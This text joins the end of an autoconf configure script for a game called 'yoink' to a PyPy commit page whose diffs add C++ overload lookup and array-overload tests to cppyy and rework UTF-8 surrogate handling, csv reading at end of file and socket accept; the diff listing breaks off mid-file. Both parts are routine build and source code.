+ result.append(STR('\\n'))
+ elif ch == '\r':
+ result.append(STR('\\r'))
+ elif ch == '\\':
+ result.append(STR('\\\\'))
+
+ # Map non-printable or non-ascii to '\xhh' or '\uhhhh'
+ elif pass_printable and not unicodedb.isprintable(oc):
+ char_escape_helper(result, oc)
+ elif not pass_printable and (oc < 32 or oc >= 0x7F):
+ char_escape_helper(result, oc)
+
+ # Copy everything else as-is
+ else:
+ result.append(CHR(oc))
+ pos += 1
+
+ if quotes:
+ result.append(CHR(quote))
+ return result.build()
+
+ def char_escape_helper(result, char):
+ num = hex(char)
+ if STR is unicode:
+ num = num.decode('ascii')
+ if char >= 0x10000:
+ result.append(STR("\\U"))
+ zeros = 8
+ elif char >= 0x100:
+ result.append(STR("\\u"))
+ zeros = 4
else:
- result.append(chr(oc))
- pos += 1
+ result.append(STR("\\x"))
+ zeros = 2
+ lnum = len(num)
+ nb = zeros + 2 - lnum # num starts with '0x'
+ if nb > 0:
+ result.append_multiple_char(STR('0'), nb)
+ result.append_slice(num, 2, lnum)
- if quotes:
- result.append(chr(quote))
- return result.build()
+ return unicode_escape, char_escape_helper
+
+# This function is also used by _codecs/interp_codecs.py
+(unicode_encode_unicode_escape, raw_unicode_escape_helper
+ ) = make_unicode_escape_function()
# ____________________________________________________________
# Raw unicode escape
return result.build(), pos
-def raw_unicode_escape_helper(result, char):
- num = hex(char)
- if char >= 0x10000:
- result.append("\\U")
- zeros = 8
- elif char >= 0x100:
- result.append("\\u")
- zeros = 4
- else:
- result.append("\\x")
- zeros = 2
- lnum = len(num)
- nb = zeros + 2 - lnum # num starts with '0x'
- if nb > 0:
- result.append_multiple_char('0', nb)
- result.append_slice(num, 2, lnum)
-
def unicode_encode_raw_unicode_escape(s, size, errors, errorhandler=None):
# errorhandler is not used: this function cannot cause Unicode errors
if size == 0:
File pypy/rlib/test/test_rpoll.py
View file
assert events[0][0] == serv.fd
assert events[0][1] & POLLIN
- servconn, cliaddr = serv.accept()
+ servconn_fd, cliaddr = serv.accept()
+ servconn = RSocket(AF_INET, fd=servconn_fd)
events = poll({serv.fd: POLLIN,
cli.fd: POLLOUT}, timeout=500)
File pypy/rlib/test/test_rsocket.py
View file
lock.acquire()
thread.start_new_thread(connecting, ())
print 'waiting for connection'
- s1, addr2 = sock.accept()
+ fd1, addr2 = sock.accept()
+ s1 = RSocket(fd=fd1)
print 'connection accepted'
lock.acquire()
print 'connecting side knows that the connection was accepted too'
if errcodesok:
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
- s1, addr2 = sock.accept()
+ fd1, addr2 = sock.accept()
+ s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
- s, addr = serversock.accept()
+ fd, addr = serversock.accept()
+ s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = clientsock.recv(100)
File pypy/rlib/test/test_runicode.py
View file
for i in range(10000):
for encoding in ("utf-7 utf-8 utf-16 utf-16-be utf-16-le "
"utf-32 utf-32-be utf-32-le").split():
+ if encoding == 'utf-8' and 0xd800 <= i <= 0xdfff:
+ # Don't try to encode lone surrogates
+ continue
self.checkdecode(unichr(i), encoding)
def test_random(self):
self.checkdecode(s, "utf-8")
def test_utf8_surrogate(self):
- # A surrogate should not be valid utf-8, but python 2.x accepts them.
- # This test will raise an error with python 3.x
- self.checkdecode(u"\ud800", "utf-8")
+ # surrogates used to be allowed by python 2.x
+ raises(UnicodeDecodeError, self.checkdecode, u"\ud800", "utf-8")
def test_invalid_start_byte(self):
"""
self.checkencode(s, "utf-8")
def test_utf8_surrogates(self):
- # check replacing of two surrogates by single char while encoding
# make sure that the string itself is not marshalled
u = u"\ud800"
for i in range(4):
u += u"\udc00"
- self.checkencode(u, "utf-8")
+ if runicode.MAXUNICODE < 65536:
+ # Check replacing of two surrogates by single char while encoding
+ self.checkencode(u, "utf-8")
+ else:
+ # This is not done in wide unicode builds
+ raises(UnicodeEncodeError, self.checkencode, u, "utf-8")
def test_ascii_error(self):
self.checkencodeerror(u"abc\xFF\xFF\xFFcde", "ascii", 3, 6)
File pypy/rpython/rstr.py
View file
from pypy.rpython.annlowlevel import hlstr
value = hlstr(llvalue)
assert value is not None
- univalue, _ = self.rstr_decode_utf_8(value, len(value), 'strict',
- False, self.ll_raise_unicode_exception_decode)
+ univalue, _ = self.rstr_decode_utf_8(
+ value, len(value), 'strict', final=False,
+ errorhandler=self.ll_raise_unicode_exception_decode,
+ allow_surrogates=False)
return self.ll.llunicode(univalue)
def ll_raise_unicode_exception_decode(self, errors, encoding, msg, s,
self.runicode_encode_utf_8 = None
def ensure_ll_encode_utf8(self):
- from pypy.rlib.runicode import unicode_encode_utf_8
- self.runicode_encode_utf_8 = func_with_new_name(unicode_encode_utf_8,
- 'runicode_encode_utf_8')
+ from pypy.rlib.runicode import unicode_encode_utf_8_impl
+ self.runicode_encode_utf_8 = func_with_new_name(
+ unicode_encode_utf_8_impl, 'runicode_encode_utf_8')
def rtype_method_upper(self, hop):
raise TypeError("Cannot do toupper on unicode string")
from pypy.rpython.annlowlevel import hlunicode
s = hlunicode(ll_s)
assert s is not None
- bytes = self.runicode_encode_utf_8(s, len(s), 'strict')
+ bytes = self.runicode_encode_utf_8(
+ s, len(s), 'strict',
+ errorhandler=self.ll_raise_unicode_exception_decode,
+ allow_surrogates=False)
return self.ll.llstr(bytes)
+ def ll_raise_unicode_exception_encode(self, errors, encoding, msg, u,
+ startingpos, endingpos):
+ raise UnicodeEncodeError(encoding, u, startingpos, endingpos, msg)
+
class __extend__(annmodel.SomeString):
def rtyper_makerepr(self, rtyper):
return rtyper.type_system.rstr.string_repr
File pypy/translator/c/genc.py
View file
def get_recent_cpython_executable():
if sys.platform == 'win32':
- python = sys.executable.replace('\\', '/') + ' '
+ python = sys.executable.replace('\\', '/')
else:
- python = sys.executable + ' '
-
+ python = sys.executable
# Is there a command 'python' that runs python 2.5-2.7?
# If there is, then we can use it instead of sys.executable
returncode, stdout, stderr = runsubprocess.run_subprocess(
"python", "-V")
if _CPYTHON_RE.match(stdout) or _CPYTHON_RE.match(stderr):
- python = 'python '
+ python = 'python'
return python
for rule in rules:
mk.rule(*rule)
+ #XXX: this conditional part is not tested at all
if self.config.translation.gcrootfinder == 'asmgcc':
trackgcfiles = [cfile[:cfile.rfind('.')] for cfile in mk.cfiles]
if self.translator.platform.name == 'msvc':
else:
mk.definition('PYPY_MAIN_FUNCTION', "main")
- python = get_recent_cpython_executable()
+ mk.definition('PYTHON', get_recent_cpython_executable())
if self.translator.platform.name == 'msvc':
lblofiles = []
'cmd /c $(MASM) /nologo /Cx /Cp /Zm /coff /Fo$@ /c $< $(INCLUDEDIRS)')
mk.rule('.c.gcmap', '',
['$(CC) /nologo $(ASM_CFLAGS) /c /FAs /Fa$*.s $< $(INCLUDEDIRS)',
- 'cmd /c ' + python + '$(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc -t $*.s > $@']
+ 'cmd /c $(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc -t $*.s > $@']
)
mk.rule('gcmaptable.c', '$(GCMAPFILES)',
- 'cmd /c ' + python + '$(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc $(GCMAPFILES) > $@')
+ 'cmd /c $(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc $(GCMAPFILES) > $@')
else:
mk.definition('OBJECTS', '$(ASMLBLFILES) gcmaptable.s')
mk.rule('%.s', '%.c', '$(CC) $(CFLAGS) $(CFLAGSEXTRA) -frandom-seed=$< -o $@ -S $< $(INCLUDEDIRS)')
mk.rule('%.lbl.s %.gcmap', '%.s',
- [python +
- '$(PYPYDIR)/translator/c/gcc/trackgcroot.py '
+ [
+ '$(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py '
'-t $< > $*.gctmp',
'mv $*.gctmp $*.gcmap'])
mk.rule('gcmaptable.s', '$(GCMAPFILES)',
- [python +
- '$(PYPYDIR)/translator/c/gcc/trackgcroot.py '
+ [
+ '$(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py '
'$(GCMAPFILES) > [email protected]',
'mv [email protected] $@'])
mk.rule('.PRECIOUS', '%.s', "# don't remove .s files if Ctrl-C'ed")
|
__label__pos
| 0.997052 |
blog
Understanding Antivirus, EDR, and XDR: A Comprehensive Guide to Cybersecurity Solutions
There has never been a more critical time to understand cybersecurity solutions like Antivirus, Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR). With increasingly sophisticated cyber threats emerging every day, these tools are essential lines of defense in protecting sensitive information and maintaining safe, secure digital infrastructures.
Understanding Antivirus Software
The first line of defense in any cybersecurity strategy is usually antivirus software. With its roots in detecting and eliminating computer viruses, Antivirus has evolved substantially to confront a wide range of malicious codes, including Trojans, ransomware, and spyware.
Antivirus software works by identifying unique signatures of known malware and blocking or removing them from your system. However, the rapid evolution of cyber threats necessitates additional layers of security that go beyond traditional signature-based detection. This necessity leads us to more advanced solutions like EDR and XDR.
Comprehending Endpoint Detection and Response (EDR)
EDR solutions provide real-time monitoring and response capabilities to potential threats at the device or endpoint level. EDR systems go beyond traditional signature-based detection by employing behavioral analytics to identify anomalies and deviations that could indicate a security breach.
Without getting too technical, EDR collects and stores endpoint data, continuously monitoring for potentially harmful activity. If detected, the EDR system runs predetermined responses—from isolating the affected machines to engaging incident management processes, thereby providing real-time threat mitigation.
While traditional antivirus software could be seen as a static guard, an EDR system is a dynamic detective—constantly investigating, learning from, and responding to changes in the network environment.
Diving Deeper: Extended Detection and Response (XDR)
XDR is essentially EDR on steroids. While EDR tends to focus on endpoint protection, XDR expands the security viewpoint across all network segments. This comprehensive solution allows for threat detection, analytics, and response across endpoints, networks, servers, and cloud providers.
XDR solutions centralize and automate these tasks; a major boon for organizations wrestling with multiple, uncoordinated security tools. This automation reduces errors, speeds up response times, and allows for faster remediation of threats across an entire IT infrastructure.
By aggregating data from across an organization's security infrastructure, XDR can use machine learning and AI to identify patterns and behaviors that could indicate a threat. This proactive approach can potentially prevent breaches before they occur, rather than simply responding once they have.
The Importance of Implementation
It is important to note that simply investing in antivirus, EDR, or XDR solutions is not enough. Implementing these tools effectively requires a clear cybersecurity strategy, rigorous protocols, and employee training. Without these components, even the most advanced security solution can fail to protect an organization from cyber threats.
Additionally, organizations must also consider factors like the potential business impact of a security breach, regulatory requirements, and the cost of implementing and maintaining the selected security solution. It's a balancing act between operational continuity, regulatory compliance, and fiscal responsibility.
In conclusion
In conclusion, antivirus, EDR, and XDR represent different tiers of cybersecurity solutions. Antivirus EDR XDR are tools that strengthen in their complexity and scope with each progressive step. The choice between them depends on an organization's specific needs, threat landscape, and resources. Ultimately, it's about understanding these tools and deploying them strategically to best protect your organizational assets in an increasingly perilous digital world.
John Price
Chief Executive Officer
October 6, 2023
9 minutes
Home
Capabilities
About
Contact
|
__label__pos
| 0.89641 |
Windows 10 April 2018 Update - New Timeline Feature is why I LOVE the new Microsoft
MVP
Today Microsoft announced all of the new features in the Windows 10 April update and one really caught my eye: Timeline. It pretty much allows you to backtrack and fine that latest email or file you were working on. In the past I’d just open the program in question and look at the history, but with Timeline I can go straight to what I’m looking for right away.
How does it affect Microsoft Access?
We’ve been programming Timeline into our programs for years now, it’s a great way for example to find which customer you looked at in the past but can’t quite remember their name. What if we could have the native OS track the records in question for us? We could look at our timeline and open the database, load the record and viola, I’m in business.
I suspect the new feature would only work with files, but I’d love to see this go further, if it does it for URL’s, why not records?
6 Replies
Thanks for the heads up, Juan!
I was wondering what the new Timeline feature was being advertised during update.
I've never used Task View much myself, but may be worth it now (vs gesture mapping + Alt-Tab).
I like were you are going with this idea of allowing users to navigate back to previous records via Windows Timeline.
Maybe something that could help make support for Access records in Windows Timeline feasible (and without requiring as much Access-specific customization of Timeline) is having Microsoft Access provide general support for assigning URLs + query parameters to Forms in Access, together with an msaccess:// protocol handler.
Then we could navigate back to a particular form, report, query or other Access object, optionally with a specific record, built-in Filter/Sort state or other custom state parameters. This could make it possible to navigate to a specific view for a specific record, or just a form or report in general via Windows Timeline.
If Microsoft Access team provided support for an msaccess:// protocol, then that could also be used to provide generalized backwards/forwards (with form opening and filter/sort/focus change history) navigation. Then, even without requiring Windows team to buy into this idea, the Access team could deliver most of the benefit, in allowing backwards/forwards view state navigation. The Access team could even expose this state via a new Recent Records/Objects menu in File > Open > Recent dialog, a separate Records/Objects Timeline dialog, and/or Backwards/Forwards buttons (+ history drop-down) similar to Undo/Redo in Access or Forward/Backwards in Visual Studio.
Ideally Access would make this possible without the same absolute file paths among users, such as with support for a series of known "search paths" for databases (eg. possibly even using paths defined at Access Options > Trust Center > Trusted Locations) and/or placeholder or environment variable (eg. {UserFolder}, {User/DefaultNetworkShareFolder}) which could be used to locate a database by name. Database path resolving could be quite useful in and of itself, for database references and other purposes.
Moreover, with the death of Access Web Apps, the ability to launch Access straight to a specific database, with a specific form, report or record from, for example, SharePoint, PowerApps, Power BI or a link on a web page or in an email would IMO go a long way towards making Access databases more web-friendly/integrated and feasible to use in more cases where otherwise would have ended up building an Access Web App, back before were deprecated.
Especially considering that, for some reason, PowerApps (despite often being pushed as the "Access Web Apps replacement") still can't use Access database as a data source, despite Power BI supporting it via the same shared On-Premises Gateway, that would be a big boon, in my opinion, to encouraging more Access use in the face of frequent web/cloud migrations.
On that note, does anyone know why PowerApps still doesn't support use of Access Databases as a data source, despite sharing the same On-Premises Gateway which enables Power BI to connect to Access databases?
Any chance we could this finally supported? Or anyone with some clout with PowerApps or Access team who could help make that possible?
Just creating or voting for a feature request on User Voice seems unlikely to make that happen if still hasn't happened already.
It seems counter-intuitive IMO that something marketed as an "Access Web Apps" replacement like PowerApps (and which presumably justifies no longer needing Access Web Apps to be supported) wouldn't even allow connections to Access databases.
That is, unless doing so is a conscious part of what seemed to be Microsoft's earlier push to encourage migrating away from Access (eg. the initial attempt to remove from most Office subscriptions/editions until user backlash saw it added to more editions instead).
I know that using an Access database as a back-end isn't as reliable or high-performance as SQL Server or Azure SQL as a back-end, but it seems like a step up in many cases compared to just using an Excel workbook as a back-end (via On-Premises Gateway or OneDrive), which is a primary use case for PowerApps.
Providing support for Access databases in PowerApps would IMO go a long ways towards increasing PowerApps adoption and likely use cases, as well as encouraging more users to stick with easily-editable Access databases vs. porting to Common Data Service (not always so intuitive) or SQL Server (not easy for end-users / or subject matter experts like Financial Analysts to modify and maintain without IT or consultant involvement).
I totally upvote this one
@DanMoorehead_PowerWeb5AI wrote:
On that note, does anyone know why PowerApps still doesn't support use of Access Databases as a data source, despite sharing the same On-Premises Gateway which enables Power BI to connect to Access databases?
It is a major concern not to have clear indications on major features like that in a roadmap for 2019.
I agree. I'd very much like to have an idea if/when may end up seeing PowerApps support for connections to Access databases, which are already supported via same shared On-Premises Gateway, but only for Power BI.
Can anyone on Access, PowerApps or Power BI team answer that one, or any else familiar with the reason for that limitation currently?
Though there already is an ms-access:// protocol, I would suggest such links behaving as described in previous post, and enabling use of them even from internet security zone websites by default (as isn't the case) in order to maximize feasibility of using Access with otherwise web-based use cases.
Does anyone have links to documentation regarding the format and behavior of ms-access:// protocol links or can otherwise detail this?
|
__label__pos
| 0.614812 |
Linux kernel & device driver programming
Cross-Referenced Linux and Device Driver Code
[ source navigation ] [ diff markup ] [ identifier search ] [ freetext search ] [ file search ]
Version: [ 2.6.11.8 ] [ 2.6.25 ] [ 2.6.25.8 ] [ 2.6.31.13 ] Architecture: [ i386 ]
1 /*
2 * Copyright(c) 2006, Intel Corporation.
3 *
4 * This program is free software; you can redistribute it and/or modify it
5 * under the terms and conditions of the GNU General Public License,
6 * version 2, as published by the Free Software Foundation.
7 *
8 * This program is distributed in the hope it will be useful, but WITHOUT
9 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
10 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
11 * more details.
12 *
13 * You should have received a copy of the GNU General Public License along with
14 * this program; if not, write to the Free Software Foundation, Inc.,
15 * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
16 *
17 */
18 #ifndef _ADMA_H
19 #define _ADMA_H
20 #include <linux/types.h>
21 #include <linux/io.h>
22 #include <asm/hardware.h>
23 #include <asm/hardware/iop_adma.h>
24
25 #define ADMA_ACCR(chan) (chan->mmr_base + 0x0)
26 #define ADMA_ACSR(chan) (chan->mmr_base + 0x4)
27 #define ADMA_ADAR(chan) (chan->mmr_base + 0x8)
28 #define ADMA_IIPCR(chan) (chan->mmr_base + 0x18)
29 #define ADMA_IIPAR(chan) (chan->mmr_base + 0x1c)
30 #define ADMA_IIPUAR(chan) (chan->mmr_base + 0x20)
31 #define ADMA_ANDAR(chan) (chan->mmr_base + 0x24)
32 #define ADMA_ADCR(chan) (chan->mmr_base + 0x28)
33 #define ADMA_CARMD(chan) (chan->mmr_base + 0x2c)
34 #define ADMA_ABCR(chan) (chan->mmr_base + 0x30)
35 #define ADMA_DLADR(chan) (chan->mmr_base + 0x34)
36 #define ADMA_DUADR(chan) (chan->mmr_base + 0x38)
37 #define ADMA_SLAR(src, chan) (chan->mmr_base + (0x3c + (src << 3)))
38 #define ADMA_SUAR(src, chan) (chan->mmr_base + (0x40 + (src << 3)))
39
40 struct iop13xx_adma_src {
41 u32 src_addr;
42 union {
43 u32 upper_src_addr;
44 struct {
45 unsigned int pq_upper_src_addr:24;
46 unsigned int pq_dmlt:8;
47 };
48 };
49 };
50
51 struct iop13xx_adma_desc_ctrl {
52 unsigned int int_en:1;
53 unsigned int xfer_dir:2;
54 unsigned int src_select:4;
55 unsigned int zero_result:1;
56 unsigned int block_fill_en:1;
57 unsigned int crc_gen_en:1;
58 unsigned int crc_xfer_dis:1;
59 unsigned int crc_seed_fetch_dis:1;
60 unsigned int status_write_back_en:1;
61 unsigned int endian_swap_en:1;
62 unsigned int reserved0:2;
63 unsigned int pq_update_xfer_en:1;
64 unsigned int dual_xor_en:1;
65 unsigned int pq_xfer_en:1;
66 unsigned int p_xfer_dis:1;
67 unsigned int reserved1:10;
68 unsigned int relax_order_en:1;
69 unsigned int no_snoop_en:1;
70 };
71
72 struct iop13xx_adma_byte_count {
73 unsigned int byte_count:24;
74 unsigned int host_if:3;
75 unsigned int reserved:2;
76 unsigned int zero_result_err_q:1;
77 unsigned int zero_result_err:1;
78 unsigned int tx_complete:1;
79 };
80
81 struct iop13xx_adma_desc_hw {
82 u32 next_desc;
83 union {
84 u32 desc_ctrl;
85 struct iop13xx_adma_desc_ctrl desc_ctrl_field;
86 };
87 union {
88 u32 crc_addr;
89 u32 block_fill_data;
90 u32 q_dest_addr;
91 };
92 union {
93 u32 byte_count;
94 struct iop13xx_adma_byte_count byte_count_field;
95 };
96 union {
97 u32 dest_addr;
98 u32 p_dest_addr;
99 };
100 union {
101 u32 upper_dest_addr;
102 u32 pq_upper_dest_addr;
103 };
104 struct iop13xx_adma_src src[1];
105 };
106
107 struct iop13xx_adma_desc_dual_xor {
108 u32 next_desc;
109 u32 desc_ctrl;
110 u32 reserved;
111 u32 byte_count;
112 u32 h_dest_addr;
113 u32 h_upper_dest_addr;
114 u32 src0_addr;
115 u32 upper_src0_addr;
116 u32 src1_addr;
117 u32 upper_src1_addr;
118 u32 h_src_addr;
119 u32 h_upper_src_addr;
120 u32 d_src_addr;
121 u32 d_upper_src_addr;
122 u32 d_dest_addr;
123 u32 d_upper_dest_addr;
124 };
125
126 struct iop13xx_adma_desc_pq_update {
127 u32 next_desc;
128 u32 desc_ctrl;
129 u32 reserved;
130 u32 byte_count;
131 u32 p_dest_addr;
132 u32 p_upper_dest_addr;
133 u32 src0_addr;
134 u32 upper_src0_addr;
135 u32 src1_addr;
136 u32 upper_src1_addr;
137 u32 p_src_addr;
138 u32 p_upper_src_addr;
139 u32 q_src_addr;
140 struct {
141 unsigned int q_upper_src_addr:24;
142 unsigned int q_dmlt:8;
143 };
144 u32 q_dest_addr;
145 u32 q_upper_dest_addr;
146 };
147
148 static inline int iop_adma_get_max_xor(void)
149 {
150 return 16;
151 }
152
153 static inline u32 iop_chan_get_current_descriptor(struct iop_adma_chan *chan)
154 {
155 return __raw_readl(ADMA_ADAR(chan));
156 }
157
158 static inline void iop_chan_set_next_descriptor(struct iop_adma_chan *chan,
159 u32 next_desc_addr)
160 {
161 __raw_writel(next_desc_addr, ADMA_ANDAR(chan));
162 }
163
164 #define ADMA_STATUS_BUSY (1 << 13)
165
166 static inline char iop_chan_is_busy(struct iop_adma_chan *chan)
167 {
168 if (__raw_readl(ADMA_ACSR(chan)) &
169 ADMA_STATUS_BUSY)
170 return 1;
171 else
172 return 0;
173 }
174
175 static inline int
176 iop_chan_get_desc_align(struct iop_adma_chan *chan, int num_slots)
177 {
178 return 1;
179 }
180 #define iop_desc_is_aligned(x, y) 1
181
182 static inline int
183 iop_chan_memcpy_slot_count(size_t len, int *slots_per_op)
184 {
185 *slots_per_op = 1;
186 return 1;
187 }
188
189 #define iop_chan_interrupt_slot_count(s, c) iop_chan_memcpy_slot_count(0, s)
190
191 static inline int
192 iop_chan_memset_slot_count(size_t len, int *slots_per_op)
193 {
194 *slots_per_op = 1;
195 return 1;
196 }
197
198 static inline int
199 iop_chan_xor_slot_count(size_t len, int src_cnt, int *slots_per_op)
200 {
201 int num_slots;
202 /* slots_to_find = 1 for basic descriptor + 1 per 4 sources above 1
203 * (1 source => 8 bytes) (1 slot => 32 bytes)
204 */
205 num_slots = 1 + (((src_cnt - 1) << 3) >> 5);
206 if (((src_cnt - 1) << 3) & 0x1f)
207 num_slots++;
208
209 *slots_per_op = num_slots;
210
211 return num_slots;
212 }
213
214 #define ADMA_MAX_BYTE_COUNT (16 * 1024 * 1024)
215 #define IOP_ADMA_MAX_BYTE_COUNT ADMA_MAX_BYTE_COUNT
216 #define IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT ADMA_MAX_BYTE_COUNT
217 #define IOP_ADMA_XOR_MAX_BYTE_COUNT ADMA_MAX_BYTE_COUNT
218 #define iop_chan_zero_sum_slot_count(l, s, o) iop_chan_xor_slot_count(l, s, o)
219
220 static inline u32 iop_desc_get_dest_addr(struct iop_adma_desc_slot *desc,
221 struct iop_adma_chan *chan)
222 {
223 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
224 return hw_desc->dest_addr;
225 }
226
227 static inline u32 iop_desc_get_byte_count(struct iop_adma_desc_slot *desc,
228 struct iop_adma_chan *chan)
229 {
230 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
231 return hw_desc->byte_count_field.byte_count;
232 }
233
234 static inline u32 iop_desc_get_src_addr(struct iop_adma_desc_slot *desc,
235 struct iop_adma_chan *chan,
236 int src_idx)
237 {
238 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
239 return hw_desc->src[src_idx].src_addr;
240 }
241
242 static inline u32 iop_desc_get_src_count(struct iop_adma_desc_slot *desc,
243 struct iop_adma_chan *chan)
244 {
245 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
246 return hw_desc->desc_ctrl_field.src_select + 1;
247 }
248
249 static inline void
250 iop_desc_init_memcpy(struct iop_adma_desc_slot *desc, unsigned long flags)
251 {
252 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
253 union {
254 u32 value;
255 struct iop13xx_adma_desc_ctrl field;
256 } u_desc_ctrl;
257
258 u_desc_ctrl.value = 0;
259 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
260 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
261 hw_desc->desc_ctrl = u_desc_ctrl.value;
262 hw_desc->crc_addr = 0;
263 }
264
265 static inline void
266 iop_desc_init_memset(struct iop_adma_desc_slot *desc, unsigned long flags)
267 {
268 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
269 union {
270 u32 value;
271 struct iop13xx_adma_desc_ctrl field;
272 } u_desc_ctrl;
273
274 u_desc_ctrl.value = 0;
275 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
276 u_desc_ctrl.field.block_fill_en = 1;
277 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
278 hw_desc->desc_ctrl = u_desc_ctrl.value;
279 hw_desc->crc_addr = 0;
280 }
281
282 /* to do: support buffers larger than ADMA_MAX_BYTE_COUNT */
283 static inline void
284 iop_desc_init_xor(struct iop_adma_desc_slot *desc, int src_cnt,
285 unsigned long flags)
286 {
287 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
288 union {
289 u32 value;
290 struct iop13xx_adma_desc_ctrl field;
291 } u_desc_ctrl;
292
293 u_desc_ctrl.value = 0;
294 u_desc_ctrl.field.src_select = src_cnt - 1;
295 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
296 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
297 hw_desc->desc_ctrl = u_desc_ctrl.value;
298 hw_desc->crc_addr = 0;
299
300 }
301 #define iop_desc_init_null_xor(d, s, i) iop_desc_init_xor(d, s, i)
302
303 /* to do: support buffers larger than ADMA_MAX_BYTE_COUNT */
304 static inline int
305 iop_desc_init_zero_sum(struct iop_adma_desc_slot *desc, int src_cnt,
306 unsigned long flags)
307 {
308 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
309 union {
310 u32 value;
311 struct iop13xx_adma_desc_ctrl field;
312 } u_desc_ctrl;
313
314 u_desc_ctrl.value = 0;
315 u_desc_ctrl.field.src_select = src_cnt - 1;
316 u_desc_ctrl.field.xfer_dir = 3; /* local to internal bus */
317 u_desc_ctrl.field.zero_result = 1;
318 u_desc_ctrl.field.status_write_back_en = 1;
319 u_desc_ctrl.field.int_en = flags & DMA_PREP_INTERRUPT;
320 hw_desc->desc_ctrl = u_desc_ctrl.value;
321 hw_desc->crc_addr = 0;
322
323 return 1;
324 }
325
326 static inline void iop_desc_set_byte_count(struct iop_adma_desc_slot *desc,
327 struct iop_adma_chan *chan,
328 u32 byte_count)
329 {
330 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
331 hw_desc->byte_count = byte_count;
332 }
333
334 static inline void
335 iop_desc_set_zero_sum_byte_count(struct iop_adma_desc_slot *desc, u32 len)
336 {
337 int slots_per_op = desc->slots_per_op;
338 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc, *iter;
339 int i = 0;
340
341 if (len <= IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT) {
342 hw_desc->byte_count = len;
343 } else {
344 do {
345 iter = iop_hw_desc_slot_idx(hw_desc, i);
346 iter->byte_count = IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT;
347 len -= IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT;
348 i += slots_per_op;
349 } while (len > IOP_ADMA_ZERO_SUM_MAX_BYTE_COUNT);
350
351 if (len) {
352 iter = iop_hw_desc_slot_idx(hw_desc, i);
353 iter->byte_count = len;
354 }
355 }
356 }
357
358
359 static inline void iop_desc_set_dest_addr(struct iop_adma_desc_slot *desc,
360 struct iop_adma_chan *chan,
361 dma_addr_t addr)
362 {
363 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
364 hw_desc->dest_addr = addr;
365 hw_desc->upper_dest_addr = 0;
366 }
367
368 static inline void iop_desc_set_memcpy_src_addr(struct iop_adma_desc_slot *desc,
369 dma_addr_t addr)
370 {
371 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
372 hw_desc->src[0].src_addr = addr;
373 hw_desc->src[0].upper_src_addr = 0;
374 }
375
376 static inline void iop_desc_set_xor_src_addr(struct iop_adma_desc_slot *desc,
377 int src_idx, dma_addr_t addr)
378 {
379 int slot_cnt = desc->slot_cnt, slots_per_op = desc->slots_per_op;
380 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc, *iter;
381 int i = 0;
382
383 do {
384 iter = iop_hw_desc_slot_idx(hw_desc, i);
385 iter->src[src_idx].src_addr = addr;
386 iter->src[src_idx].upper_src_addr = 0;
387 slot_cnt -= slots_per_op;
388 if (slot_cnt) {
389 i += slots_per_op;
390 addr += IOP_ADMA_XOR_MAX_BYTE_COUNT;
391 }
392 } while (slot_cnt);
393 }
394
395 static inline void
396 iop_desc_init_interrupt(struct iop_adma_desc_slot *desc,
397 struct iop_adma_chan *chan)
398 {
399 iop_desc_init_memcpy(desc, 1);
400 iop_desc_set_byte_count(desc, chan, 0);
401 iop_desc_set_dest_addr(desc, chan, 0);
402 iop_desc_set_memcpy_src_addr(desc, 0);
403 }
404
405 #define iop_desc_set_zero_sum_src_addr iop_desc_set_xor_src_addr
406
407 static inline void iop_desc_set_next_desc(struct iop_adma_desc_slot *desc,
408 u32 next_desc_addr)
409 {
410 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
411 BUG_ON(hw_desc->next_desc);
412 hw_desc->next_desc = next_desc_addr;
413 }
414
415 static inline u32 iop_desc_get_next_desc(struct iop_adma_desc_slot *desc)
416 {
417 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
418 return hw_desc->next_desc;
419 }
420
421 static inline void iop_desc_clear_next_desc(struct iop_adma_desc_slot *desc)
422 {
423 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
424 hw_desc->next_desc = 0;
425 }
426
427 static inline void iop_desc_set_block_fill_val(struct iop_adma_desc_slot *desc,
428 u32 val)
429 {
430 struct iop13xx_adma_desc_hw *hw_desc = desc->hw_desc;
431 hw_desc->block_fill_data = val;
432 }
433
434 static inline int iop_desc_get_zero_result(struct iop_adma_desc_slot *desc)
435 {
